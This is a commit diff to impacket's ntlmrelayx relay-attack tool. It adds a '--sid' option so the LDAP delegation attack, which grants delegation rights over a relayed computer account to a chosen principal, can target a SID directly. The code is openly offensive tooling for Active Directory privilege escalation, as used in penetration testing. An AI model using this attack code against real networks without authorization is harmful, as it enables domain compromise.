Added support for supplying the sid as the escalate user for delegati…

…on attacks
gitAkaal · Jan 12, 2020 · d348909 · d348909
1 parent 8df51ad
commit d348909
Show file tree

Hide file tree

Showing 3 changed files with 15 additions and 10 deletions.
diff --git a/examples/ntlmrelayx.py b/examples/ntlmrelayx.py
@@ -145,7 +145,7 @@ def start_servers(options, threads):
         c.setAttacks(PROTOCOL_ATTACKS)
         c.setLootdir(options.lootdir)
         c.setOutputFile(options.output_file)
-        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access)
+        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.sid)
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
         c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
@@ -279,6 +279,7 @@ def stop_servers(threads):
     ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
     ldapoptions.add_argument('--add-computer', action='store', metavar='COMPUTERNAME', required=False, const='Rand', nargs='?', help='Attempt to add a new computer account')
     ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
+    ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name')
 
     #IMAP options
     imapoptions = parser.add_argument_group("IMAP client options")

diff --git a/impacket/examples/ntlmrelayx/attacks/ldapattack.py b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -187,7 +187,7 @@ def addUserToGroup(self, userDn, domainDumper, groupDn):
         else:
             LOG.error('Failed to add user to %s group: %s' % (groupName, str(self.client.result)))
 
-    def delegateAttack(self, usersam, targetsam, domainDumper):
+    def delegateAttack(self, usersam, targetsam, domainDumper, sid):
         global delegatePerformed
         if targetsam in delegatePerformed:
             LOG.info('Delegate attack already performed for this computer, skipping')
@@ -197,12 +197,15 @@ def delegateAttack(self, usersam, targetsam, domainDumper):
             usersam = self.addComputer('CN=Computers,%s' % domainDumper.root, domainDumper)
             self.config.escalateuser = usersam
 
-        # Get escalate user sid
-        result = self.getUserInfo(domainDumper, usersam)
-        if not result:
-            LOG.error('User to escalate does not exist!')
-            return
-        escalate_sid = str(result[1])
+        if not sid:
+            # Get escalate user sid
+            result = self.getUserInfo(domainDumper, usersam)
+            if not result:
+                LOG.error('User to escalate does not exist!')
+                return
+            escalate_sid = str(result[1])
+        else:
+            escalate_sid = usersam
 
         # Get target computer DN
         result = self.getUserInfo(domainDumper, targetsam)
@@ -577,7 +580,7 @@ def run(self):
 
         # Perform the Delegate attack if it is enabled and we relayed a computer account
         if self.config.delegateaccess and self.username[-1] == '$':
-            self.delegateAttack(self.config.escalateuser, self.username, domainDumper)
+            self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)
             return
 
         # Add a new computer if that is requested

diff --git a/impacket/examples/ntlmrelayx/utils/config.py b/impacket/examples/ntlmrelayx/utils/config.py
@@ -136,14 +136,15 @@ def setDomainAccount(self, machineAccount, machineHashes, domainIp):
     def setRandomTargets(self, randomtargets):
         self.randomtargets = randomtargets
 
-    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess):
+    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, sid):
         self.dumpdomain = dumpdomain
         self.addda = addda
         self.aclattack = aclattack
         self.validateprivs = validateprivs
         self.escalateuser = escalateuser
         self.addcomputer = addcomputer
         self.delegateaccess = delegateaccess
+        self.sid = sid
 
     def setMSSQLOptions(self, queries):
         self.queries = queries